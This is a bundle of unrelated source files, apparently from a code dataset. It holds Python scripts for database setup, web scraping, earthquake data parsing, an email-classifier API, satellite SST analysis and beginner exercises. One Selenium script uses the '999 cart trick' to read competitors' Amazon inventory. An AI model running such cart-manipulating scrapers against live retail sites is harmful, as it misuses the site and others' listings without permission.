pd.concat([ab_tr,catr],axis=1)\nexceldata.to_excel('event_window_daily_abnormal_turnover_rate.xlsx')","sub_path":"event_window_abnormal_turnover_rate/abnormal_turnover_rate_calculation.py","file_name":"abnormal_turnover_rate_calculation.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"98243966","text":"\"Ideogenesis: Database setup; indexes and constraints.\"\n\nfrom __future__ import print_function, absolute_import\n\nimport logging\nimport json\n\nfrom ideogenesis import constants\nfrom ideogenesis import settings\nfrom ideogenesis import utils\n\n\ndef setup(neo4j):\n \"Create uniqeness constraints if not done.\"\n ensure_uniqueness(neo4j, 'Any', 'iuid')\n ensure_uniqueness(neo4j, 'User', 'username_normalized')\n ensure_uniqueness(neo4j, 'User', 'email')\n ensure_uniqueness(neo4j, 'Person', 'name_normalized')\n ensure_index(neo4j, 'Person', 'sortname')\n ensure_index(neo4j, 'Person', 'shortname')\n ensure_uniqueness(neo4j, 'Text', 'title_normalized')\n ensure_uniqueness(neo4j, 'Info', 'path')\n\ndef ensure_uniqueness(neo4j, label, property_key):\n url = neo4j.get_url('constraints', \"{}/uniqueness\".format(label))\n response = neo4j.session.get(url)\n neo4j.check_http(response, 200)\n if exists_uniqueness(response.json(), label, [property_key]):\n logging.info(\"Uniqueness constraint for {}:{} exists\".format(\n label, property_key))\n else:\n data = json.dumps(dict(property_keys=[property_key]))\n response = neo4j.session.post(url, data=data)\n neo4j.check_http(response, 200)\n logging.info(\"Created uniqueness constraint for {}:{}\".format(\n label, property_key))\n\ndef exists_uniqueness(data, label, property_keys):\n \"Does a uniqueness constraint exist for the given label and property keys?\"\n for item in data:\n if item['label'] != label: continue\n if item['type'] != 'UNIQUENESS': continue\n if set(item['property_keys']) == set(property_keys): return True\n return False\n\ndef ensure_index(neo4j, label, property_key):\n url = neo4j.get_url('indexes', label)\n response = neo4j.session.get(url)\n neo4j.check_http(response, 200)\n if exists_index(response.json(), label, [property_key]):\n logging.info(\"Index for {}:{} exists\".format(label, property_key))\n else:\n data = json.dumps(dict(property_keys=[property_key]))\n response = neo4j.session.post(url, data=data)\n neo4j.check_http(response, 200)\n logging.info(\"Created index for {}:{}\".format(label, property_key))\n\ndef exists_index(data, label, property_keys):\n \"Does an index exist for the given label and property keys?\"\n for item in data:\n if item['label'] != label: continue\n if set(item['property_keys']) == set(property_keys): return True\n return False\n\n\nif __name__ == '__main__':\n args = utils.get_args(description='Ideogenesis db index setup')\n utils.load_settings(filepath=args.settings, verbose=args.verbose)\n neo4j = utils.get_neo4j(check=True)\n print('Neo4j server', neo4j.version)\n setup(neo4j)\n","sub_path":"ideogenesis/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"24430545","text":"import requests\nimport time\nimport cgi\nimport shutil\nimport os\n\nimport urllib\n\ndef status_check(status_code):\n if status_code == 200:\n print (str(status_code) + ': OK')\n else:\n print (str(status_code) + ': Failed')\n\n\ns = requests.Session()\n\n# \"ownership_code\": \"0\", \"datatype_code\": \"3\",\"case_code\": \"A\"\n\nurl = \"https://data.bls.gov/cgi-bin/dsrv?cs\"\nurl = \"https://data.bls.gov/cgi-bin/dsrv\"\n\nparams = {\"state_code\": \"00\", \"level\": \"1\", \"survey\": \"cs\", \"format\": \"\",\"html_tables\": \"\", \"delimiter\": \"\",\n \"catalog\": \"\", \"print_line_length\": \"\", \"lines_per_page\": \"\", \"row_stub_key\": \"\", \"year\": \"\",\n \"date\": \"\", \"net_change_start\": \"\", \"net_change_end\": \"\", \"percent_change_start\": \"\",\n \"percent_change_end\": \"\"}\n\n\n\n#page = s.post(url, params=params, stream=True)\npage = s.get(url, params=params)\n\n\n\nprint(url)\nstatus_check(page.status_code)\n\nprint(page.text)","sub_path":"bls_web_test.py","file_name":"bls_web_test.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"338676220","text":"n = int(input(\"Input n > \"))\n\ny = 0\nx = 0\nwhile y * y < n:\n y += 1\nans = y\n\nwhile True:\n x += 1\n stop_iteration = False\n while x * x + y * y >= n:\n y -= 1\n if y < 0:\n stop_iteration = True\n break\n if stop_iteration:\n break\n ans += y + 1\n\nprint(\"%s possible solutions\" % ans)\n","sub_path":"1.1.29.py","file_name":"1.1.29.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"426533646","text":"# Write a program to prompt the user for hours and rate per hour using \n# input to compute gross pay. \n# Pay the hourly rate for the hours up to 40 and 1.5 times the hourly rate\n# for all hours worked above 40 hours. Use 45 hours and a rate of 10.50 per hour\n# to test the program (the pay should be 498.75). \n# You should use input to read a string and float() to convert the string to a number. \n# Do not worry about error checking the user input - assume the user types numbers properly. \ninputhours = input(\"Enter Hours:\")\nhours = float(inputhours)\ninputrate = input(\"Rate:\")\nrate = float(inputrate)\nif (hours > 40):\n regHours = 40\n overHours = hours - 40\nelse:\n\tregHours = hours\n\toverHours = 0\n\npay = regHours * rate + overHours * rate * 1.5\n\nprint(pay)","sub_path":"pay.py","file_name":"pay.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"452844264","text":"import csv\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\n\nurl=(\"https://movie.douban.com/top250\")\n\nresult=[]\n\ndef get_full_title(movie_Obj):\n title_info = movie_Obj.findAll(\"div\",{\"class\":\"hd\"})\n titles = title_info[0].findAll(\"span\",{\"class\":{\"title\", \"other\"}})\n full_title = ''\n for title in titles:\n full_title += title.get_text()\n return full_title\n\ndef get_movie_info(movie_Obj):\n info = movie_Obj.findAll(\"div\",{\"class\":\"bd\"})[0].find(\"p\").get_text().replace(\" \",'').strip()\n return info\n\ndef get_star(movie_Obj):\n star = movie_Obj.find(\"span\",{\"class\":\"rating_num\"}).get_text()\n return star\n\ndef get_quote(movie_Obj):\n quote = movie_Obj.find(\"span\",{\"class\":\"inq\"})\n if quote:\n quote = quote.get_text()\n else:\n quote = ''\n return quote\n\ndef get_next_url(page):\n next_url = page.find(\"link\",{\"rel\":\"next\"})\n if next_url:\n return url + next_url[\"href\"]\n else:\n return False\n\ndef parse_page(movies_Obj):\n for movie_Obj in movies_Obj:\n movie_result=[]\n movie_result.append(get_full_title(movie_Obj))\n movie_result.append(get_movie_info(movie_Obj))\n movie_result.append(get_star(movie_Obj))\n movie_result.append(get_quote(movie_Obj))\n result.append(movie_result)\n\n\ndef main(url):\n print('Fatching URL: ',url)\n html = urlopen(url)\n page = BeautifulSoup(html.read(),'lxml')\n movies_Obj = page.findAll(\"div\", {\"class\":\"info\"})\n parse_page(movies_Obj)\n next_url = get_next_url(page)\n if next_url:\n main(next_url)\n\nmain(url)\nwith open('test.csv', 'w+', newline='', encoding='utf-8') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(('影片标题', '影片信息', '影片评分', '引用'))\n writer.writerows(result)\n","sub_path":"douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"338386467","text":"from collections import Counter\n\nN = int(input())\nS = [input() for _ in range(N)]\ncount_s = []\nfor s in S:\n tmp = 0\n if len(list(filter(lambda x: s[0], s))) == 1:\n continue\n for word in s:\n tmp += 10 ** (ord(word) - ord(\"a\"))\n count_s.append(tmp)\n\npattern = Counter(count_s)\nans = 0\nfor i in pattern.values():\n ans += (i*(i-1)) // 2\nprint(ans)\n","sub_path":"contest/abc137/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"257554656","text":"import logging\nfrom logging.handlers import TimedRotatingFileHandler\nimport pandas as pd\nfrom flask import Flask, abort, redirect, request, jsonify\nfrom flask_restful import Resource, Api, reqparse\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.linear_model import LogisticRegression\nimport scipy\nimport pickle\n\ndef people_tokenizer(s):\n people = s.split(';')\n return filter(None, people)\n\napp = Flask(__name__)\napi = Api(app)\nparser = reqparse.RequestParser()\nparser.add_argument('Body', type=str, help='The body of the email to be sorted.')\nparser.add_argument('Subject', type=str, help='The subject of the email to be sorted.')\nparser.add_argument('ToRecipients', type=str, help='The to line of the email to be sorted, semi-colon separated')\nparser.add_argument('Sender', type=str, help='The sender of the email to be sorted')\nparser.add_argument('CcRecipients', type=str, help='The cc line of the email to be sorted, semi-colon separated')\nparser.add_argument('SentDateTime', type=str, help='The datetime that the email was sent.')\n\nclass HelloWorld(Resource):\n def get(self):\n return {}\n\n# TODO: Serve N predictions in one request to improve performance\nclass Prediction(Resource):\n def post(self):\n args = parser.parse_args()\n app.logger.debug(args)\n\n # userId = '8lWZYw-u-yNbGBkC4B--ip77K1oVwwyZTHKLeD7rm7k'\n userId = request.args['userId']\n\n # Load message as pandas dataframe\n query_message = pd.DataFrame(args, index=[0])\n app.logger.debug(query_message.head(5))\n\n # TODO: Load model from local file, since we only have one user right now.\n # TODO: Could hold in memory to limit i/o on every request\n try:\n app.logger.debug('Reading model for user {0} from disk'.format(userId))\n pkl_name = '{0}.pkl'.format(userId)\n pipeline = pickle.load(open(pkl_name, 'rb'))\n \n except Exception as ex:\n app.logger.error(str(ex))\n raise ex\n\n app.logger.debug(pipeline)\n sub_vect = pipeline.named_steps['sub_vocab']\n sub_tfidf = pipeline.named_steps['sub_tfidf']\n people_vect = pipeline.named_steps['people_vocab']\n trained_model = pipeline.named_steps['classifier']\n\n # Perform bag of words vectorization on Subject\n subject_counts = sub_vect.transform(query_message['Subject'])\n app.logger.debug('Performed bag of words feature construction on subject')\n\n # Convert Subject from bools to tf-idf values\n subject_tfidf = sub_tfidf.transform(subject_counts)\n\n # Create a new column that merges CC, To, From\n query_message['CcRecipients'].fillna('', inplace=True)\n query_message['ToRecipients'].fillna('', inplace=True)\n query_message['Sender'].fillna('', inplace=True)\n query_message['People'] = query_message['Sender'] + ';' + query_message['CcRecipients'] + ';' + query_message['ToRecipients']\n app.logger.debug(query_message.head(5))\n\n # Convert people column into email address counts\n people_counts = people_vect.transform(query_message['People'])\n app.logger.debug('Performed one hot encodig of people column')\n\n # Merge people counts with subject tf-idf\n feature_matrix = scipy.sparse.hstack([people_counts, subject_tfidf])\n\n # Make prediction on resulting query message\n class_predictions = trained_model.predict_proba(feature_matrix)\n app.logger.debug(class_predictions)\n prediction_idx = -1\n best_prediction = 0\n for idx, prediction in enumerate(class_predictions[0]):\n if prediction > best_prediction:\n prediction_idx = idx\n best_prediction = prediction\n\n return { 'class_label': trained_model.classes_[prediction_idx], 'probability': best_prediction }\n\napi.add_resource(Prediction, '/predict/')\napi.add_resource(HelloWorld, '/hello/')\n\nif __name__ == '__main__':\n\n logHandler = TimedRotatingFileHandler('./logs/predictions.log', when=\"D\", interval=1, backupCount=0)\n logHandler.setLevel(logging.DEBUG)\n app.logger.setLevel(logging.DEBUG)\n app.logger.addHandler(logHandler)\n\n app.run(port=5000, host='0.0.0.0')","sub_path":"prediction_service/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"401760684","text":"# Import JSON and urllib.request module\n\nimport json\nimport urllib.request\n\n# Create a function printResults to store parsed json using 'loads' method using features found in json key value pair data from usgs website\n\ndef printResults(data):\n\n theJSON = json.loads(data)\n\n if \"title\" in theJSON[\"metadata\"]:\n print(theJSON[\"metadata\"][\"title\"])\n\n count = theJSON[\"metadata\"][\"count\"]\n print(str(count) + \" events recorded\")\n\n for i in theJSON[\"features\"]:\n print(i[\"properties\"][\"place\"])\n print(\"------------------\\n\")\n\n for i in theJSON[\"features\"]:\n if i[\"properties\"][\"mag\"] >= 4.0:\n print(\"%2.1f\" % i[\"properties\"][\"mag\"], i[\"properties\"][\"place\"])\n print(\"------------------\\n\")\n\n# Main function to load url data from usgs website\n\ndef main():\n\n urldata = \"https://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/2.5_day.geojson\"\n\n# Error handling option to first check if you can connect to the website\n\n webUrl = urllib.request.urlopen(urldata)\n print('result code: ' + str(webUrl.getcode()))\n if (webUrl.getcode() == 200):\n\n# If no error found read the webUrl data and store results in printResults(data)\n\n data = webUrl.read()\n printResults(data)\n else:\n print(\"Received error, cannot parse results\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"USGS_JSON_parsing.py","file_name":"USGS_JSON_parsing.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"336640172","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport cv2 as cv\n\n#_________________________________________\noriginal = cv.imread('table.jpg')\ncv.imshow('Original', original)\n#-----角点检测---先变成灰度图\ngray = cv.cvtColor(original, cv.COLOR_BGR2GRAY)\ncv.imshow('gray', gray)\n\n# star特征点检测器\nstar = cv.xfeatures2d.StarDetector_create()\nkeypoints = star.detect(gray)\nmixture = original.copy()\ncv.drawKeypoints(original, keypoints, mixture,\n flags=cv.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\ncv.imshow('Mixture', mixture)\ncv.waitKey()\n","sub_path":"PythonWeb/基础/前端课程资料/买的网页/MS/day7/star.py","file_name":"star.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"16379219","text":"### COMPOSITION / AGGREGATION\n# Part 3\n#\n\nprint(\"PART 3\")\n\n# Let's make a simple class to hold and display book information\nclass Book:\n def __init__(self, title, author, publishing_year):\n self.title = title\n self.author = author\n self.year = publishing_year\n \n def display(self):\n print(\"TITLE: %s, by %s (%d)\" % (self.title, self.author, self.year))\n\n# ... and class shelf that will just store books\nclass Shelf:\n def __init__(self):\n self.books = []\n \n def add(self, book):\n self.books.append(book)\n \n def show(self):\n print(\"\\nThis shelf contains:\")\n for b in self.books:\n b.display()\n \n# Create 3 books\nbook1 = Book(\"Intro. to Python\", \"Jos\", 2015)\nbook2 = Book(\"Hobbit\", \"Tolkien\", 1937)\nbook3 = Book(\"Pride and Prejudice\", \"Jane Austen\", 1813)\n\n# To test that everything works, we will call display for all\nbook1.display()\nbook2.display()\nbook3.display()\n\n# Next we create our shelf object and add 2 books to it\nmyshelf = Shelf()\nmyshelf.add(book1)\nmyshelf.add(book2)\n\n# If everything is implemented correctly,\n# ... calling show method will display all books\nmyshelf.show()\n\n\nprint(\"\\n\\nEOF part 3\")\nprint(\"-\"*20)","sub_path":"Analysis 3/ANL3 Lecture 2.2.py","file_name":"ANL3 Lecture 2.2.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"398129894","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport time\n\n#export PATH=$PATH:/Users/leo/Desktop/selenium\n\n\n#####################################\n#for learning purposes only\n#This script automates the task of retrieving an Amazon product listing's inventory data\n#Which take advantage of a well known '999 cart tricks' to qualifying sales of a potential competitor.\n#By tracking the quantity available of the product over several days or weeks, \n#one can have good idea of how many units your potential competition is selling per day.\n#####################################\n\n\ntoCheck = [] #input list of product ASIN \nresult = []\nnum = 1\nfor ASIN in toCheck:\n\t\n\t#launch web browser\n\tdriver = webdriver.Firefox()\n\tdriver.implicitly_wait(30)\n\tdriver.maximize_window()\n\t\n\t#go to amazon product page\n\tdriver.get('https://www.amazon.ca/dp/product/' + ASIN + '/')\n\tprint(num)\n\tnum = num + 1\n\t\n\ttry:\n\t\t#add to cart\n\t\taddtocartBtn = driver.find_element_by_xpath('//*[@id=\"add-to-cart-button\"]')\n\t\tactions = ActionChains(driver)\n\t\tactions.click(addtocartBtn).perform()\n\t\tprint(addtocartBtn)\n\t\n\t\ttime.sleep(1)\n\t\t\n\t\t#view Cart\n\t\tviewCart = driver.find_element_by_xpath('//*[@id=\"hlb-view-cart-announce\"]')\n\t\tviewCart.click()\n\t\tprint(viewCart)\n\n\t\ttime.sleep(1)\n\t\t\n\t\t# find quantity box and set Quantity \n\t\tquantity_box = driver.find_element_by_xpath('//*[@id=\"activeCartViewForm\"]/div[2]/div/div[4]/div/div[3]/div/div/span')\n\t\tprint(quantity_box)\n\t\ttime.sleep(2)\n\t\tquantity_box.click()\n\n\t\tquantity_dropdown = driver.find_element_by_xpath('//*[@id=\"a-popover-3\"]/div/div/ul/li[10]')\n\t\tquantity_dropdown.click()\n\t\t#actions.click(quantity_dropdown).perform()\n\t\n\t\ttime.sleep(2)\n\n\t\tquantity_input = driver.find_element_by_xpath('/html/body/div[1]/div[4]/div/div[4]/div/div[2]/div[4]/form/div[2]/div/div[4]/div/div[3]/div/div/input')\n\t\tquantity_input.send_keys('999')\n\t\tquantity_input.send_keys(Keys.ENTER)\n\t\n\t\ttime.sleep(2)\n\t\n\t\t#get result from quantity box\n\t\ttext = driver.find_element_by_xpath('/html/body/div[1]/div[4]/div/div[4]/div/div[2]/div[4]/form/div[2]/div/div[4]/div[1]/div/div/div/span').text\n\t\tprint(text)\n\t\tresult.append(text)\n\t\ttime.sleep(1)\n\t#pass if product is not available\n\texcept NoSuchElementException:\n\t\ttext = 'NA'\n\t\tresult.append(text)\n\t\tpass\n\tdriver.quit()\n\t\n\nprint(result)\n\n# strip text and get number of inventory\nnumList=[]\nfor i in result:\n\ttry:\n\t\ttem = i.split('only ')[1]\n\t\tfinal = tem.split(' of')[0]\n\texcept IndexError:\n\t\tfinal = 'NA'\n\t\tpass\n\tnumList.append(final)\nprint(numList)\n\n","sub_path":"get_product_inventory_count.py","file_name":"get_product_inventory_count.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"563945732","text":"\"\"\" Run SSL Analysis specific to the paper \"\"\"\n\nimport os\nimport numpy as np\n\nimport pandas\n\nfrom matplotlib import pyplot as plt\n\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nimport statsmodels.api as sm\nfrom statsmodels.stats.stattools import durbin_watson\nimport statsmodels.formula.api as smf\n\nfrom ulmo import io as ulmo_io\nfrom ulmo.nenya import defs as ulmo_ssl_defs\n\nimport ssl_defs\n\nfrom IPython import embed\n\nif os.getenv('OS_SST'):\n local_modis_file = os.path.join(os.getenv('OS_SST'),\n 'MODIS_L2/Tables/MODIS_L2_std.parquet')\n local_modis_CF_file = os.path.join(os.getenv('OS_SST'),\n 'MODIS_L2/Tables/MODIS_SSL_cloud_free.parquet')\n local_modis_CF_DT2_file = os.path.join(os.getenv('OS_SST'),\n 'MODIS_L2/Tables/MODIS_SSL_cloud_free_DT2.parquet')\n local_modis_96_file = os.path.join(os.getenv('OS_SST'),\n 'MODIS_L2/Tables/MODIS_SSL_96clear.parquet')\n\n# Geography\ngeo_regions = ulmo_ssl_defs.geo_regions\n\n# UMAP ranges for the paper\numap_rngs_dict = {}\n#umap_rngs_dict['weak_DT15'] = [[1.5,3.], # DT15, old UMAP\n# [1.5,3]]\numap_rngs_dict['weak_DT1'] = [[0, 2.0], # DT1, new UMAP\n [-2.5,-0.3]]\n#umap_rngs_dict['weak_DT1'] = [[-1, 1.], # DT1, new UMAP\n# [-3.,-0.5]]\numap_rngs_dict['strong_DT1'] = [[4.0,8-0.7], # DT1, new UMAP\n [2.4,4]]\n\ndef lon_to_lbl(lon):\n if lon < 0:\n return '{:d}W'.format(int(-lon))\n else:\n return '{:d}E'.format(int(lon))\n \ndef lat_to_lbl(lat):\n if lat < 0:\n return '{:d}S'.format(int(-lat))\n else:\n return '{:d}N'.format(int(lat))\n\ndef load_modis_tbl(table:str=None, \n local=False, cuts:str=None, \n region:str=None, percentiles:list=None):\n \"\"\"Load up the MODIS table and (usually) cut it down\n\n Args:\n table (str, optional): Code for the table name. Defaults to None.\n std, CF, CF_DT0, ...\n local (bool, optional): Load file on local harddrive?. Defaults to False.\n cuts (str, optional): Named cuts. Defaults to None.\n inliers: Restrict to LL = [200,400]\n region (str, optional): Cut on geographic region. Defaults to None.\n Brazil, GS, Med\n percentiles (list, optional): Cut on percentiles of LL. Defaults to None.\n\n Raises:\n IOError: _description_\n\n Returns:\n pandas.Dataframe: MODIS table\n \"\"\"\n\n # Which file?\n if table is None:\n table = '96' \n if table == 'std': # Original; too many clouds\n basename = 'MODIS_L2_std.parquet'\n else:\n # Base 1\n if 'CF' in table:\n base1 = 'MODIS_SSL_cloud_free'\n elif '96_v4' in table:\n base1 = 'MODIS_SSL_v4'\n elif '96' in table:\n base1 = 'MODIS_SSL_96clear'\n # DT\n if 'DT' in table:\n if 'v4' in table:\n base1 = 'MODIS_SSL_96clear_v4'\n dtstr = table.split('_')[-1]\n base2 = '_'+dtstr\n elif 'v4_a' in table:\n base1 = 'MODIS_SSL_96clear_v4'\n dtstr = table.split('_')[-1]\n base2 = '_'+dtstr\n else:\n base2 = ''\n # \n basename = base1+base2+'.parquet'\n\n if local:\n tbl_file = os.path.join(os.getenv('OS_SST'), \n 'MODIS_L2', 'Nenya',\n 'Tables', basename)\n else:\n tbl_file = 's3://modis-l2/Tables/'+basename\n\n # Load\n modis_tbl = ulmo_io.load_main_table(tbl_file)\n\n # DT\n if 'DT' not in modis_tbl.keys():\n modis_tbl['DT'] = modis_tbl.T90 - modis_tbl.T10\n modis_tbl['logDT'] = np.log10(modis_tbl.DT)\n modis_tbl['lowDT'] = modis_tbl.mean_temperature - modis_tbl.T10\n modis_tbl['absDT'] = np.abs(modis_tbl.T90) - np.abs(modis_tbl.T10)\n\n # Slopes\n modis_tbl['min_slope'] = np.minimum(\n modis_tbl.zonal_slope, modis_tbl.merid_slope)\n\n # Cut\n goodLL = np.isfinite(modis_tbl.LL)\n if cuts is None:\n good = goodLL\n elif cuts == 'inliers':\n inliers = (modis_tbl.LL > 200.) & (modis_tbl.LL < 400)\n good = goodLL & inliers\n modis_tbl = modis_tbl[good].copy()\n\n # Region?\n if region is None:\n pass\n elif region == 'brazil':\n # Brazil\n in_brazil = ((np.abs(modis_tbl.lon.values + 57.5) < 10.) & \n (np.abs(modis_tbl.lat.values + 43.0) < 10))\n in_DT = np.abs(modis_tbl.DT - 2.05) < 0.05\n modis_tbl = modis_tbl[in_brazil & in_DT].copy()\n elif region == 'GS':\n # Gulf Stream\n in_GS = ((np.abs(modis_tbl.lon.values + 69.) < 3.) & \n (np.abs(modis_tbl.lat.values - 39.0) < 1))\n modis_tbl = modis_tbl[in_GS].copy()\n elif region == 'Med':\n # Mediterranean\n in_Med = ((modis_tbl.lon > -5.) & (modis_tbl.lon < 30.) &\n (np.abs(modis_tbl.lat.values - 36.0) < 5))\n modis_tbl = modis_tbl[in_Med].copy()\n else: \n raise IOError(f\"Bad region! {region}\")\n\n # Percentiles\n if percentiles is not None:\n LL_p = np.percentile(modis_tbl.LL, percentiles)\n cut_p = (modis_tbl.LL < LL_p[0]) | (modis_tbl.LL > LL_p[1])\n modis_tbl = modis_tbl[cut_p].copy()\n\n return modis_tbl\n\ndef grab_subset(DT:float):\n raise ValueError(\"Deal with DT40\")\n for key, item in ssl_defs.umap_DT.items():\n if item is None:\n raise ValueError(\"Should not get to all!!\")\n if item[1] < 0:\n DTmin = item[0]\n DTmax = 1e9\n else:\n DTmin = item[0] - item[1]\n DTmax = item[0] + item[1]\n #\n if (DT >= DTmin) & (DT < DTmax):\n break\n\n # Return\n return key\n\ndef time_series(df, metric, show=False):\n # Dummy variables for seasonal\n dummy = np.zeros((len(df), 11), dtype=int)\n for i in np.arange(11):\n for j in np.arange(len(df)):\n if df.month.values[j] == i+1:\n dummy[j,i] = 1\n\n # Setup\n time = np.arange(len(df)) + 1\n\n # Repack\n data = pandas.DataFrame()\n data['fitme'] = df[metric].values\n data['time'] = time\n dummies = []\n for idum in np.arange(11):\n key = f'dum{idum}'\n dummies.append(key)\n data[key] = dummy[:,idum]\n\n # Cut Nan\n keep = np.isfinite(df[metric].values)\n data = data[keep].copy()\n\n # Fit\n formula = \"fitme ~ dum0 + dum1 + dum2 + dum3 + dum4 + dum5 + dum6 + dum7 + dum8 + dum9 + dum10 + time\"\n glm_model = smf.glm(formula=formula, data=data).fit()#, family=sm.families.Binomial()).fit()\n\n # Summary\n glm_model.summary()\n\n # Show?\n if show:\n plt.clf()\n fig = plt.figure(figsize=(12,8))\n #\n ax = plt.gca()\n ax.plot(data['time'], data['values'], 'o', ms=2)\n # Fit\n ax.plot(data['time'], glm_model.fittedvalues)\n #\n plt.show()\n\n # Build some useful stuff\n\n # Inter-annual fit\n xval = np.arange(len(df))\n result_dict = {}\n result_dict['slope'] = glm_model.params['time']\n result_dict['slope_err'] = np.sqrt(\n glm_model.cov_params()['time']['time'])\n\n\n seas = []\n seas_err = []\n for idum in np.arange(11):\n key = f'dum{idum}'\n # Value\n seas.append(glm_model.params[key])\n # Error\n seas_err.append(np.sqrt(\n glm_model.cov_params()[key][key]))\n\n # Add em all up\n yval = glm_model.params['Intercept'] + xval * glm_model.params['time'] + (\n np.mean(seas))\n result_dict['trend_yvals'] = yval\n\n # Add one more\n seas.append(0.)\n seas_err.append(0.)\n result_dict['seasonal'] = seas\n result_dict['seasonal_err'] = seas_err\n\n # Return\n return glm_model, result_dict\n\ndef gen_umap_keys(umap_dim:int, umap_comp:str):\n \"\"\" Generate the keys for UMAP \n\n Args:\n umap_dim (int): dimension of UMAP\n umap_comp (str): \n\n Returns:\n umap_keys (tuple): tuple of keys for UMAP\n \"\"\"\n if umap_dim == 2:\n if 'T1' in umap_comp:\n umap_keys = ('UT1_'+umap_comp[0], 'UT1_'+umap_comp[-1])\n else:\n ps = umap_comp.split(',')\n umap_keys = ('U'+ps[0], 'U'+ps[-1])\n elif umap_dim == 3:\n umap_keys = ('U3_'+umap_comp[0], 'U3_'+umap_comp[-1])\n return umap_keys\n\n","sub_path":"papers/Nenya/Analysis/py/ssl_paper_analy.py","file_name":"ssl_paper_analy.py","file_ext":"py","file_size_in_byte":8422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"423881863","text":"from datetime import datetime\nfrom http.cookies import SimpleCookie\nfrom typing import Optional, List\n\n\nclass Cookie:\n def __init__(\n self,\n name: str,\n value: str,\n path: Optional[str] = None,\n domain: Optional[str] = None,\n expires: Optional[datetime] = None,\n ):\n self.name = name\n self.value = value\n self.path = path\n self.domain = domain\n self.expires = expires\n\n cookie: SimpleCookie = SimpleCookie()\n cookie[name] = str(value)\n if domain:\n cookie[name][\"domain\"] = domain\n if path:\n cookie[name][\"path\"] = path\n if expires:\n cookie[name][\"expires\"] = expires.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\n self.cookie = cookie\n\n def __str__(self) -> str:\n return str(self.cookie)\n\n def header(self) -> List[str]:\n return [part.strip() for part in str(self).split(\":\", 1)]\n\n\n__all__ = [\"Cookie\"]\n","sub_path":"chocs/cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"599107103","text":"# Ask the user for their grades.\ngeometry = input(\"Grade for Geometry: \")\nalgebra = input(\"Grade for Algebra: \")\nphysics = input(\"Grade for Physics: \")\n\n# We need them as numbers, not as strings.\ngeometry = int(geometry)\nalgebra = int(algebra)\nphysics = int(physics)\n\n# Add everything together and divide by 3 to get the average.\naverage = (geometry + algebra + physics) / 3\n\n# Another possible solution using a list:\n# grades = [geometry, algebra, physics]\n# average = sum(grades) / len(grades)\n\nprint(\"Your average: \" + str(average))\n\n# Encourage the student to work harder.\nif average >= 7:\n print(\"Good job!\")\nelif 4 < average < 7:\n print(\"You need to work a little harder.\")\nelse:\n print(\"You need to work a lot harder.\")\n","sub_path":"Solutions/ex9.py","file_name":"ex9.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541090366","text":"#!/usr/bin/env python3\n#récupére le fichier en paramètre et en extrait la grille de taquin a resoudre\n\nimport sys\n\ndef clean_comment(line):\n if '#' in line: # Nettoyage des potentiels commentaires :\n line = line[:line.index(\"#\")]\n #if line[-1::] in \" \\n\": # suppresion d'un eventuel \\n ou d'un espace vide en fin de ligne créé par la supression précédente d'un commentaire\n # line = line[:-1:]\n return line.strip()\n\ndef check_data_in_line(line, size, nb_of_piece, list_of_my_valid_number):\n intLine = []\n if not len(line) == size:\n print(\"Error : A number is mising in one line\")\n exit()\n for nb in line:\n if not nb.isdigit():\n print(\"Error : One data is not a number\")\n exit()\n j = int(nb)\n if not 0 <= j < nb_of_piece:\n print(\"Error : One number is not valid : \" + str(j))\n exit()\n elif j in list_of_my_valid_number:\n print(\"Error : One number is duplicated\")\n exit()\n else:\n list_of_my_valid_number.append(j)\n intLine.append(j)\n return list_of_my_valid_number, intLine\n\n\ndef parser() :\n first = True\n list_of_my_valid_number = []\n nb_of_piece = 0\n grid = []\n size_of_grid = 0\n if len(sys.argv) == 2:\n filename = sys.argv[1]\n else:\n print (\"Error : please give one filename in 